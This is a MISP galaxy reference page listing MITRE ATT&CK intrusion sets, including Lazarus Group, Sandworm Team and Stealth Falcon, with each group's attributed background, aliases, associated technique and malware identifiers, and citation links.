[Lazarus Group](https://attack.mitre.org/groups/G0032) is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau.(Citation: US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Korean Cyber Groups September 2019) The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta. Malware used by [Lazarus Group](https://attack.mitre.org/groups/G0032) correlates to other reported campaigns, including Operation Flame, Operation 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novetta Blockbuster)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups, such as [Andariel](https://attack.mitre.org/groups/G0138), [APT37](https://attack.mitre.org/groups/G0067), [APT38](https://attack.mitre.org/groups/G0082), and [Kimsuky](https://attack.mitre.org/groups/G0094).

The tag is: misp-galaxy:mitre-intrusion-set="Lazarus Group - G0032"

Lazarus Group - G0032 is also known as:

Lazarus Group
HIDDEN COBRA
Guardians of Peace
ZINC
NICKEL ACADEMY

View relationships graph

Lazarus Group - G0032 has relationships with:

similar: misp-galaxy:threat-actor="Lazarus Group" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Proxysvc - S0238" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KEYMARBLE - S0271" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Volgmer - S0180" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BADCALL - S0245" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RATANKBA - S0241" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Bankshot - S0239" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HARDRAIN - S0246" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TYPEFRAME - S0263" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="AuditCred - S0347" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FALLCHILL - S0181" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Library - T1560.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="WannaCry - S0366" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="RawDisk - S0364" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HOPLIGHT - S0376" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HotCroissant - S0431" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Dacls - S0497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cryptoistic - S0498" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="BLINDINGCAN - S0520" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="AppleJeus - S0584" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TAINTEDSCRIBE - S0586" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Dtrack - S0567" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593" with estimative-language:likelihood-probability="almost-certain"

Table 4464. Table References
Links
https://attack.mitre.org/groups/G0032
https://www.us-cert.gov/ncas/alerts/TA17-164A
https://home.treasury.gov/news/press-releases/sm774
https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/
https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing

Putter Panda - G0024

[Putter Panda](https://attack.mitre.org/groups/G0024) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-intrusion-set="Putter Panda - G0024"

Putter Panda - G0024 is also known as:

Putter Panda
APT2
MSUpdater

View relationships graph

Putter Panda - G0024 has relationships with:

similar: misp-galaxy:threat-actor="Putter Panda" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="httpclient - S0068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="4H RAT - S0065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="pngdowner - S0067" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="3PARA RAT - S0066" with estimative-language:likelihood-probability="almost-certain"

Table 4465. Table References
Links
https://attack.mitre.org/groups/G0024
http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf
http://blog.cylance.com/puttering-into-the-future

Scarlet Mimic - G0029

[Scarlet Mimic](https://attack.mitre.org/groups/G0029) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://attack.mitre.org/groups/G0029) and [Putter Panda](https://attack.mitre.org/groups/G0024), it has not been concluded that the groups are the same. (Citation: Scarlet Mimic Jan 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Scarlet Mimic - G0029"

Scarlet Mimic - G0029 is also known as:

Scarlet Mimic

View relationships graph

Scarlet Mimic - G0029 has relationships with:

similar: misp-galaxy:threat-actor="Scarlet Mimic" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="Psylo - S0078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CallMe - S0077" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="FakeM - S0076" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="MobileOrder - S0079" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"

Table 4466. Table References
Links
https://attack.mitre.org/groups/G0029
http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/

Poseidon Group - G0033

[Poseidon Group](https://attack.mitre.org/groups/G0033) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://attack.mitre.org/groups/G0033) as a security firm. (Citation: Kaspersky Poseidon Group)

The tag is: misp-galaxy:mitre-intrusion-set="Poseidon Group - G0033"

Poseidon Group - G0033 is also known as:

Poseidon Group

View relationships graph

Poseidon Group - G0033 has relationships with:

similar: misp-galaxy:threat-actor="Poseidon Group" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 4467. Table References
Links
https://attack.mitre.org/groups/G0033
https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/

Sandworm Team - G0034

[Sandworm Team](https://attack.mitre.org/groups/G0034) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) This group has been active since at least 2009.(Citation: iSIGHT Sandworm 2014)(Citation: CrowdStrike VOODOO BEAR)(Citation: USDOJ Sandworm Feb 2020)(Citation: NCSC Sandworm Feb 2020)

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://attack.mitre.org/groups/G0034) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://attack.mitre.org/software/S0368) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://attack.mitre.org/software/S0365) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: UK NCSC Olympic Attacks October 2020) Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28](https://attack.mitre.org/groups/G0007).(Citation: US District Court Indictment GRU Oct 2018)

The tag is: misp-galaxy:mitre-intrusion-set="Sandworm Team - G0034"

Sandworm Team - G0034 is also known as:

Sandworm Team
ELECTRUM
Telebots
IRON VIKING
BlackEnergy (Group)
Quedagh
VOODOO BEAR

View relationships graph

Sandworm Team - G0034 has relationships with:

similar: misp-galaxy:threat-actor="Sandworm" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="TeleBots" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="ELECTRUM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="BlackEnergy - S0089" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Exaramel for Windows - S0343" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Exaramel for Linux - S0401" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Olympic Destroyer - S0365" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NotPetya - S0368" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Invoke-PSImage - S0231" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Server - T1583.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Endpoint Denial of Service - T1499" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Properties - T1590.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Defacement - T1491.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Vulnerabilities - T1588.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Business Relationships - T1591.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software - T1592.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1598.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Employee Names - T1589.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Email Addresses - T1589.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Industroyer - S0604" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KillDisk - S0607" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="P.A.S. Webshell - S0598" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Create Account - T1136" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="CHEMISTGAMES - S0555" with estimative-language:likelihood-probability="almost-certain"

Table 4468. Table References
Links
https://attack.mitre.org/groups/G0034
https://www.justice.gov/opa/press-release/file/1328521/download
https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games
https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/
https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html
https://www.ncsc.gov.uk/news/ncsc-supports-sandworm-advisory
https://www.justice.gov/opa/page/file/1098481/download
https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/
https://www.dragos.com/resource/electrum/
https://www.secureworks.com/research/threat-profiles/iron-viking

Stealth Falcon - G0038

[Stealth Falcon](https://attack.mitre.org/groups/G0038) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. (Citation: Citizen Lab Stealth Falcon May 2016)

The tag is: misp-galaxy:mitre-intrusion-set="Stealth Falcon - G0038"

Stealth Falcon - G0038 is also known as:

Stealth Falcon

View relationships graph

Stealth Falcon - G0038 has relationships with:

similar: misp-galaxy:threat-actor="Stealth Falcon" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
